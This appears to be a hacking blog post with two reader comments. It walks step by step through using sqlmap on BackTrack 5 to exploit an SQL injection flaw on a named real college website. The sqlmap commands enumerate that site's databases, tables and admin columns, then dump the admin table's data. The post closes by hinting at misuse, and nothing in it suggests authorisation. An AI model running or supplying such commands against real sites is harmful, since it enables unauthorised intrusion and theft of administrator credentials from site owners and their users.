Hey awl although i completed mah series f SQL Injection but i would like to tell uhh awl abt sum to0ls used for doing SQL Injection_______Int diz tut i will be telling uhh awl abt mah fav SQLMAP :) Its an aww to0l
What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.Things you require
1) BackTrack 5
2) A vulnerable website :D
The vulnerable link i am going to use is
First open Backtrack5 and then open SQLMAP. You can open SQLMAP by doing the following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.
It opens your sqlmap console .
Scanning the URL and finding out the database names
Now i am going to scan the url using the following command.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --dbs
Here –u is for URL .
You can also scan the entire website by simply replacing the above URL with the website’s URL.
Now i am going to scan the link.
It has shown me a very good message that “GET parameter “id” is vulnerable”.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped by pressing ‘N’. You can continue the scan if you want.
Finding out table names
Aww..!! We got the database names. Now we need to find out the table and column names. As information_schema is for metadata, i am going with the database "nilakantatrust".
The following query gives me the table names.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --tables -D nilakantatrust
Here –D is to specify the name of the database.
Finding out column names
kewl.. Now we got 9 tables. As we are always interested in admin section, lets move on to the est_admin table and find the column names in that table.So we use the following query
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --column -T est_admin -D nilakantatrust
Retrieving Data
We got all the columns from the table est_admin. Now we have to retrieve the data from the database. For that we need to write the following query. We are just adding –dump to the above query.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --column -T est_admin -D nilakantatrust --dump
We got all the data we want. I hope you know what to do now.
this one helps , i have been doing this manually this hacking (wast of time) time to upgrade thanks
ReplyDeleteactually if u r a beginner then firstly try doing it manually because it helps you in understanding that how and what you actually do while hacking like this :)
ReplyDeletethrough this you can find new things also
but if u already understood manual then yes for saving tym you can try softs :)